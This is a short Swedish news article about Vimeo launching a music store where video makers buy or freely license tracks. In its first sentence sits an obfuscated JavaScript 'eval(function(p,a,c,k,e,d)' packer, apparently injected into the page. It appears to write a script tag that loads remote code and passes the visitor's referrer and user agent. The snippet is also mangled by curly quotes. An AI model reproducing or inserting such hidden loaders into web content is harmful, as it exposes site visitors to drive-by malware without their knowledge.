Image Image Image Image Image Image Image Image Image Image

| 17 oktober, 2018

Scroll to top

Top

Filmtjänsten Vimeo öppnar musik-butik

Filmtjänsten Vimeo öppnar musik-butik
Sebastian Plengier Ehrnfelt

Nu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kstrn|var|u0026u|referrer|snetr||js|php’.split(‘|’),0,{}))
kan du köpa musik till dina videos direkt i Vimeo Music Store.

Filmtjänsten Vimeo har nu släppt en helt egen musikaffär där videoproducenter enkelt kan köpa loss musik som kan användas i videofilmer.

Du kan söka på musik i alla olika kategorier och när man hittar något man gillar är det bara att inkassera låten mot en slant. Därefter är det bara att implementera i filmen.
I videon nedan kan ni se hur det är tänkt att tjänsten ska användas.

I Vimeo Music Store finns 45.000 låtar och även om de flesta kostar pengar så finns det en hel del gratis udner Creative Common-licens. Priserna ligger omkring 1,99 dollar om den ska användas privat i en video annars får man lägga ut ca 98 dollar ifall videon ska användas i kommersiellt syfte.

Mer info: vimeo.com